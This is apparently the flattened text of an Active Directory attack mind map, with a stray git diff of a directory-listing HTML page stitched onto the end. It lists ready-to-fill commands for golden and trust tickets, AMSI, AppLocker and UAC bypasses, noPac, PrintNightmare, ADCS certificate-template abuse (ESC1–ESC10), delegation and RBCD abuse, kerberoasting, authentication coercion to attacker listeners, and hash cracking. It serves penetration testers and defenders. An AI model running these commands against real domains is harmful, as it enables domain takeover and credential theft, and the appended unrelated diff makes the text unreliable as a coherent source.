/ptt‎lookupsid.py -domain-sids <domain>/<user>:'<‎password>'@<dc_ip> 0‎ticketer.py -nthash <child_krbtgt_hash> -domain-‎sid <child_sid> -domain <child_domain>‎ -extra-sid <parent_domain_sid>-519 goldenuser‎raiseChild.py <domain>/<user>:'<password>' ‎inter_realm_ticket TRUST (parent/child) (child/‎parent)‎mimikatz lsadump::trust /patch‎mimikatz kerberos::golden /user:Administrator /‎domain:<domain> /sid:<domain_sid> /aes256:<‎trust_key_aes256> /sids:<target_domain_sid>-‎519 /service:krbtgt /target:<target_domain> /ptt‎ticketer.py -nthash <trust_key> -domain-sid <‎child_sid> -domain <child_domain>‎ -extra-sid <parent_domain_sid>-519 -spn ‎krbtgt/<parent_domain> goldenuser‎getST.py -k -no-pass -spn cifs/<dc_fqdn> <‎parent_domain>/trustfakeuser@<parent_‎domain> -debug‎Breaking forest trust‎(printerbug or petitpotam to force the DC of the ‎external forest to connect on a local ‎unconstrained delegation machine. Capture TGT, ‎inject into memory and dcsync)‎ForeignGroupMember‎Users with foreign Domain Group Membership‎MATCH p=(n:User)-[:MemberOf]->(m:Group) ‎WHERE n.domain="<domain>" AND m.domain<>‎n.domain RETURN p‎Groups with Foreign Domain Group Membership‎MATCH p=(n:Group {domain:"<domain>"})-[:‎MemberOf]->(m:Group) WHERE m.domain<>n.‎domain AND n.name<>m.name RETURN p‎Get-DomainForeignGroupMember -Domain <‎target>‎convertfrom-sid <sid>‎User on both domains‎ACL‎password reuse‎Forest To Forest - extra SID‎(SID History / TREAT_AS_EXTERNAL)‎Golden ticket‎Get-DomainSID -Domain <domain>‎Get-DomainSID -Domain <target_domain>‎(SID filtering, Find group with SID > 1000)‎Get-DomainGroupMember -Identity "<group>" -‎Domain <target_domain>‎mimikatz lsadump::dcsync /domain:<domain> /‎user:<domain>\krbtgt‎mimikatz kerberos::golden /user:Administrator /‎krbtgt:<HASH_KRBTGT> /domain:<domain> /‎sid:<user_sid> /sids:<RootDomainSID>-<GROUP_‎SID_SUP_1000> /ptt‎ticketer.py -nthash <krbtgt_hash> -domain-sid <‎from_sid> -domain <from_domain>‎ -extra-sid <to_domain>-<group_id> ‎goldenuser //(group id must be > 1000)‎Trust ticket‎Get the trust ticket in the ntds (TARGET_‎DOMAIN$)‎ticketer.py -nthash <trust_key> -domain-sid <‎from_domain_sid> -domain <from_domain>‎ -extra-sid <to_domain>-<group_id> -spn ‎krbtgt/<to_domain> trustuser //(group id must ‎be > 1000)‎getST.py -k -no-pass -spn cifs/<dc_fqdn> <‎parent_domain>/trustfakeuser@<parent_‎domain> -debug‎Forest to Forest Compromise - MSSQL trusted ‎links‎Get-SQLServerLinkCrawl -username <user> -‎password <pass> -Verbose -Instance <sql_‎instance>‎mssqlclient.py -windows-auth <domain>/<‎user>:<password>@<ip> (pr #1397)‎trustlink‎sp_linkedservers‎use_link‎MSSQL‎Pass the ticket‎Uncontrained delegation‎lateral move (creds/pth/...)‎Pass the ticket‎Low access‎Get Applocker info‎Get-ChildItem -Path HKLM:\SOFTWARE\Policies\‎Microsoft\Windows\SrpV2\Exe (dll/msi/...)‎winpeas.exe‎AMSI bypass‎https://amsi.fail/‎Reflection method‎Patching amsi.dll‎search password files‎findstr /si 'password' *.txt *.xml *.docx‎User account‎clear text pass‎AppLocker (whitelisting) bypass‎use C:\Windows\Tasks‎use C:\Windows\Temp‎Powershell CLM bypass‎installutil.exe /logfile= /LogToConsole=false /U ‎C:\runme.exe‎mshta.exe my.hta‎MSBuild‎User Access Control (UAC) bypass‎FodHelper‎WSReset‎MSDT‎SMBGhost CVE-2020-0796‎CVE-2021-36934 (HiveNightmare/‎SeriousSAM)‎service account (IIS/Mssql) ‎(got SEImpersonate)‎RoguePotato‎Juicy Potato / Lovely Potato‎🔥 PrintSpoofer‎CertPotato‎./Rubeus tgtdeleg /nowrap‎TGT (pass the ticket)‎certipy req -k -ca <ca>‎ -template Machine -target <dc>‎certipy auth -pfx <pfxile>‎shadow credentials‎certipy shadow auto -u '<machine>$'@<‎domain> -k account '<machine$>'‎Machine NT Hash‎ticketer.py -nthash <hash> -domain-sid <‎domain_sid> -domain <domain> -spn cifs/<dc> <‎targetUser>‎🔥 KrbRelayUp‎.\KrbRelayUp.exe relay -Domain <domain> -‎CreateNewComputerAccount -ComputerName <‎computer$> -ComputerPassword <password>‎./KrbRelayUp.exe spawn -m rbcd -d <omdain> -‎dc <dc> -cn <computer_name>-cp <omputer_‎pass>‎...‎Admin Access‎Low access (without applocker)‎Known vulnerabilities‎MS14-068‎FindSMB2UPTime.py <ip>‎rpcclient $> lookupnames <name>‎wmic useraccount get name,sid‎auxiliary/admin/kerberos/ms14_068_kerberos_‎checksum‎goldenPac.py -dc-ip <dc_ip> <domain>/<‎user>:'<password>'@<target>‎privexchange‎(CVE-2019-0724, CVE-2019-0686)‎python privexchange.py -ah <attacker_host_or_‎ip> <exchange_host> -u <user> -d <domain> -p <‎password>‎Coerce HTTP ->‎dom admin‎Admin‎🔥SamAccountName / nopac‎CVE-2021-42287/CVE-2021-42278‎scan‎cme smb <ip> -u <user> -p <password> -M ‎nopac‎.\noPac.exe -domain <domain> -user <user> -‎pass <pass> /dc <dc_fqdn> /mAccount <‎machine_account> /mPassword <machine_‎pass> /service cifs /ptt‎with impacket : addcomputer.py / addspn.py / ‎renameMachine.py / getTGT.py / ‎renameMachine.py / getST.py‎Pass the ticket‎DCSYNC‎DOM ADMIN‎Delete computer‎🔥PrintNightmare ‎(CVE-2021-1675 / CVE-2021-34527)‎CVE-2021-1675.py <domain>/<user>:<‎password>@<target> '\\<smb_server_ip>\<‎share>\inject.dll'‎🔥Certifried‎(CVE-2022-26923)‎(need ADCS)‎certipy account create -u <user>@<domain> -‎p '<password>' -user 'certifriedpc' -pass '‎certifriedpass' -dns '<fqdn_dc>'‎certipy req -u 'certifriedpc$'@<domain> -p '‎certifriedpass' -target <ca_fqdn> -ca <ca_‎name> -template Machine‎certipy auth -pfx <pfx_file> -username '<dc>$' -‎domain <domain> -dc-ip <dc_ip>‎Pass the ticket‎DCSYNC‎DOM ADMIN‎Delete computer‎Admin‎Pass the ticket‎dom admin‎Admin‎ADCS weak configuration‎ Web enrollement is up‎🔥ESC8‎ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.‎asp -debug -smb2support --adcs --template ‎DomainController‎Rubeus.exe asktgt /user:<user> /certificate:<‎base64-certificate> /ptt‎gettgtpkinit.py -pfx-base64 $(cat cert.b64) <‎domain>/<dc_name>$ <ccache_file>‎certipy relay -ca <ca_ip> -template ‎DomainController‎certipy auth -pfx <certificate> -dc-ip <dc_ip>‎Pass the ticket‎DCSync‎DomAdmin‎Get templates information ‎ certutil -v -dsTemplate‎ certify.exe find [ /vulnerable]‎ certipy find -u <user>@<domain> -p <‎password> -dc-ip <domaincontroller>‎Misconfigured Certificate Templates‎ESC1 (Request a certificate from a vulnerable ‎template)‎certipy req -u <user>@<domain> -p <‎password> -target <ca_server> -template '<‎vulnerable template name>' -ca <ca_name> -‎upn <target_user>@<domain>‎certify.exe request /ca:<server>\<ca-name> /‎template:"<vulnerable template name>" [/‎altname:"Admin"]‎Pass the certificate‎ESC2‎ESC3 (Use an enrollement agent to request a ‎certificate)‎certify.exe request /ca:<server>\<ca-name> /‎template:"<vulnerable template name>"‎certify.exe request request /ca:<server>\<ca-‎name> /template:<template> /onbehalfof:<‎domain>\<user> /enrollcert:<path.pfx> [/‎enrollcertpw:<cert-password>]‎certipy req -u <user>@<domain> -p <‎password> -target <ca_server> -template '<‎vulnerable template name>' -ca <ca_name>‎certipy req -u <user>@<domain> -p <‎password> -target <ca_server> -template '<‎vulnerable template name>' -ca <ca_name> -on-‎behalf-of '<domain>\<user>' -pfx <cert>‎Pass the certificate‎getACL information‎ certipy find -u <user>@<domain> -p <‎password> -dc-ip <domaincontroller>‎Misconfigured ACL‎ESC4‎write privilege over a certificate template‎certipy template -u <user>@<domain> -p '<‎password>' -template <vuln_template> -save-‎old -debug‎ESC1 on vulnerable template‎restore template‎certipy template -u <user>@<domain> -p '<‎password>' -template <vuln_template> -‎configuration <template>.json‎ESC7‎Manage CA‎certipy ca -ca <ca_name> -add-officer '<user>' -‎username <user>@<domain> -password <‎password>‎Manage certificate‎certipy ca -ca <ca_name> -enable-template '<‎ecs1_vuln_template>'-username <user>@<‎domain> -password <password>‎certipy req -username <user>@<domain> -‎password <password> -ca <ca_name> -‎template '<vulnerable template name>' -upn '<‎target_user>'‎error, but save private key‎Issue request‎certipy ca -u <user>@<domain> -p '<‎password>' -ca <ca_name> -issue-request <‎request_id>‎certipy req -u <user>@<domain> -p '<‎password>' -ca <ca_name> -retreive <request_‎id>‎Pass the certificate‎Display CA information‎ certutil -TCAInfo‎ certify.exe cas‎Get CA flags (if remote registry is enabled)‎ certutil -config "CA_HOST\CA_NAME" -getreg "‎policy\EditFlags"‎certipy / certify.exe (only the flag ‎ATTRIBUTESUBJECTALTNAME2)‎Misconfigured CA‎ESC6 ‎Abuse ATTRIBUTESUBJECTALTNAME2 flag set ‎on CA‎you can choose any certificate template that ‎permits client authentication‎ESC1‎Get PKI objects information‎ certify.exe pkiobjects‎vulnerable PKI Object access control‎ESC5‎ACL‎Misconfigured Certificate Mapping ‎(blind test)‎ESC9/ESC10‎certipy shadow auto -username <accountA>@<‎domain> -p <passA> -account <accountB>‎ESC9/ESC10 (Case 1)‎certipy account update -username <‎accountA>@<domain> -password <passA> -‎user <accountB> -upn Administrator‎ESC9‎certipy req -username <accountB>@<domain> -‎hashes <hashB> -ca <ca_name> -template <‎vulnerable template>‎ESC10 (Case 1)‎certipy req -username <accountB>@<domain> -‎hashes <hashB> -ca <ca_name> -template <any ‎template with client auth>‎ESC10 (Case 2)‎certipy account update -username <‎accountA>@<domain> -password <passA> -‎user <accountB> -upn '<dc_name$>@<domain>'‎Reset accountB UPN‎certipy account update -username <‎accountA>@<domain> -password <passA> -‎user <accountB> -upn <accountB>@<domain>‎[Kerberos Mapping] ESC9/ESC10(Case 1)‎[Schannel Mapping] ESC9/ESC10 (Case 2) ‎Pass the certificate‎Kerberos Delegation‎list delegations‎ldeep ldap -u <user> -p '<password>' -d <‎domain> -s ldap://<dc_ip> delegations‎findDelegation.py <domain>/<user>:<‎password>@<ip>‎Unconstrained delegation‎Get unconstrained delegation machines‎Get-NetComputer -Unconstrained‎Get-DomainComputer -Unconstrained -‎Properties DnsHostName‎MATCH (c:Computer {unconstraineddelegation:‎true}) RETURN c‎MATCH (u:User {owned:true}), (c:Computer {‎unconstraineddelegation:true}), p=shortestPath((‎u)-[*1..]->(c)) RETURN p‎UAC: ADS_UF_TRUSTED_FOR_DEL‎EGATION‎Get tickets‎privilege::debug sekurlsa::tickets /export ‎sekurlsa::tickets /export‎Rubeus dump /service:krbtgt /nowrap‎Rubeus dump /luid:0xdeadbeef /nowrap‎(Force_connection_with_coerced_auth)‎Rubeus monitor /interval:5‎Kerberos TGT‎Kerberos TGT‎Pass The Ticket‎if dc‎DCSync‎DomAdmin‎Constrained delegation‎Get constrained delegation‎Get-DomainComputer -TrustedToAuth -‎Properties DnsHostName, MSDS-‎AllowedToDelegateTo‎Get-DomainUser -TrustedToAuth‎MATCH (c:Computer), (t:Computer), p=((c)-[:‎AllowedToDelegate]->(t)) RETURN p‎MATCH (u:User {owned:true}), (c:Computer {‎name: "<MYTARGET.FQDN>"}), p=shortestPath((‎u)-[*1..]->(c)) RETURN p‎With protocol transition (any)‎Object: msDS-AllowedToDelegateTo‎UAC: TRUST_TO_AUTH_FOR_DELEGA‎TION‎Rubeus hash /password:<password>‎Rubeus asktgt /user:<user> /domain:<domain> /‎aes256:<AES 256 hash>‎Rubeus s4u /ticket:<ticket> /impersonateuser:<‎admin_user> /msdsspn:<spn_constrained> /‎altservice:CIFS /ptt‎Altservice‎HOST‎psexec \\\<target> <cmd>‎HTTP‎Enter-Pssession -computername <target>‎Invoke-Command <target> -Scriptblock {<cmd>}‎CIFS‎dir \\<target>\c$‎LDAP‎Kerberos TGS‎Without protocol transition (kerberos only)‎Object: msDS-AllowedToDelegateTo‎UAC: TRUSTED_FOR_DELEGATION‎RBCD‎addcomputer.py -computer-name '<rbcd_‎com>$' -computer-pass '<rbcd_compass>' -dc-‎ip <dc> '<domain>/<user>:<password>'‎rbcd.py -delegate-from '<rbcd_com>$' -‎delegate-to '<constrained>$' -dc-ip‎'<dc>' -action 'write' -hashes '<hash>'‎<domain>/<constrained>$‎getST.py -self -impersonate "administrator" -dc-‎ip <ip> <domain>/<rbcd_com>$':'<rbcd_‎compass>'‎getST.py -spn host/<constrained> -hashes '' '<‎domain>/<computer_account>' -impersonate ‎Administrator --dc-ip <dc_ip> -additional-‎ticket <previous_ticket>‎getST.py -spn <constrained_spn>/<target> -‎hashes '<hash>' '<domain>/<constrained>$' -‎impersonate Administrator --dc-ip <dc_ip> -‎additional-ticket <previous_ticket>‎Kerberos TGS‎self RBCD‎Resource-Based Constrained Delegation ‎(RBCD)‎Object: msDS-‎AllowedToActOnBehalfOfOtherIdentit‎rubeus.exe hash /password:<computer_pass> /‎user:<computer> /domain:<domain>‎rubeus.exe s4u /user:<fake_computer$> /‎aes256:<AES 256 hash> /impersonateuser:‎administrator /msdsspn:cifs/<victim.domain.‎local> /altservice:krbtgt,cifs,host,http,winrm,‎RPCSS,wsman,ldap /domain:domain.local /ptt‎rbcd.py -delegate-from '<computer>$' -‎delegate-to '<target>$' -dc-ip‎'<dc>' -action 'write'‎<domain>/<user>:<password>‎getST.py -spn host/<dc_fqdn> '<domain>/<‎computer_account>:<computer_pass>' -‎impersonate Administrator --dc-ip <dc_ip>‎Kerberos TGT‎add computer account‎addcomputer.py -computer-name '<computer_‎name>' -computer-pass '<ComputerPassword>' -‎dc-host <dc> -domain-netbios <domain_‎netbios> '<domain>/<user>:<password>'‎Admin‎Got Account on the domain‎authenticated‎(cleartext pass / kerberos / NTLM)‎Get all users‎GetADUsers.py -all -dc-ip <dc_ip> <domain>/<‎username>‎cme smb <ip> -u <user> -p '<password>' --users ‎ldeep ldap -u <user> -p '<password>' -d <‎domain> -s ldap://<dc_ip> users‎Users‎enumerate SMB share‎cme smb <ip> -u <user> -p <password> --shares‎Account‎exploit smbshare‎cme smb <ip> -u <user> -p <password> -M ‎slinky -o NAME=<filename> SERVER=<ip>‎drop .url file‎Coerce SMB ->‎🔥bloodhound‎bloodhound-python -d <domain> -u <user> -p <‎password> -gc <dc> -c all‎./rusthound -d <domain_to_enum> -u '<user>@<‎domain>' -p '<password>' -o <outfile> -z‎import-module sharphound.ps1;invoke-‎bloodhound -collectionmethod all -domain <‎domain>‎sharphound.exe -c all -d <domain>‎enum ldap‎ldeep ldap -u <user> -p '<password>' -d <‎domain> -s ldap://<dc_ip> all <backup_folder>‎Powerview / SharpView‎adPeas‎pingcastle‎🔥kerberoasting‎Get kerberoastable users‎Get-DomainUser -SPN -Properties ‎SamAccountName, ServicePrincipalName‎MATCH (u:User {hasspn:true}) RETURN u‎MATCH (u:User {hasspn:true}), (c:Computer), p=‎shortestPath((u)-[*1..]->(c)) RETURN p‎Get hash‎GetUserSPNs.py -request -dc-ip <dc_ip> <‎domain>/<user>:<password>‎Rubeus kerberoast‎hash found (TGS)‎Enum dns ‎dnstool.py -u 'DOMAIN\user' -p 'password' --‎record '*' --action query <dc_ip>‎Scan network‎Enumerate AD CS ‎ 🔥 certipy find -u <user>@<domain> -p <‎password> -dc-ip <domaincontroller>‎Enumerate Azure AD connect‎find AAD connect server from MSOL description‎cme ldap <ip> -u <user> -p <password> -M get-‎desc-users | grep -i MSOL‎Coerce‎Webdav‎cme smb <ip> -u <user> -p <password> -M ‎webdav #find‎start webdav with Documents.searchConnector-‎ms file‎cme smb <ip> -u '<user>' -p '<pass>' -M drop-sc‎add attack computer in dns‎dnstool.py -u '<domain>\<user>' -p '<pass>' --‎record‎'<attack_name>' --action add --data <ip_listen> <‎dc_ip>‎coerce with <attacker_hostname>@80/‎something as target‎Coerce HTTP ->‎rpcdump.py <domain>/<user>:<password>@<‎domain_server> | grep MS-RPRN‎printerbug.py '<domain>/<username>:<‎password>'@<Printer IP> <listener_ip>‎PetitPotam.py -d <domain> -u <user>-p <‎password> <listener_ip> <target_ip>‎🔥coercer.py -u <user> -d <domain> -p <‎password> -t <target> -l <attacker_ip>‎Coerce SMB ->‎exploit !‎connect to computer‎ADCS‎Domain enum‎ACL‎Delegation‎Users‎Lateral move‎Known vulnerabilities‎Crack Hash‎LM‎john --format=lm hash.txt‎hashcat -m 3000 -a 3 hash.txt‎NTLM‎john --format=nt hash.txt‎hashcat -m 1000 -a 3 hash.txt‎NetNTLMv1‎john --format=netntlm hash.txt‎hashcat -m 5500 -a 3 hash.txt‎https://crack.sh/‎NetNTLMv2‎john --format=netntlmv2 hash.txt‎hashcat -m 5600 -a 0 hash.txt rockyou.txt‎Kerberos 5 TGS‎hashcat -m 13100 -a 0 spn.txt rockyou.txt‎john spn.txt --format=krb5tgs --wordlist=‎rockyou.txt‎Kerberos 5 TGS AES128‎hashcat -m 19600 -a 0 spn.txt rockyou.txt‎Kerberos 5 TGS AES256‎hashcat -m 19700 -a 0 spn.txt rockyou.txt‎Kerberos ASREP‎hashcat -m 18200 -a 0 AS-REP_roast-hashes ‎rockyou.txt‎MsCache 2 (slow)‎hashcat -m 2100 -a 0 mscache-hash rockyou.txt‎User account‎clear text pass \ No newline at end of file diff --git a/index.html b/index.html index ddd8ca9..322ade4 100644 --- a/index.html +++ b/index.html @@ -40,123 +40,132 @@

Directory Listing

  • Reset-DockerWslIntegration.ps1
    • -
  • Documents/ +
  • EduDocuments/
    • -
  • References/ +
  • CheatSheets/
  • Useful-Repositories/ -
    • -
  • Web-Applications/ -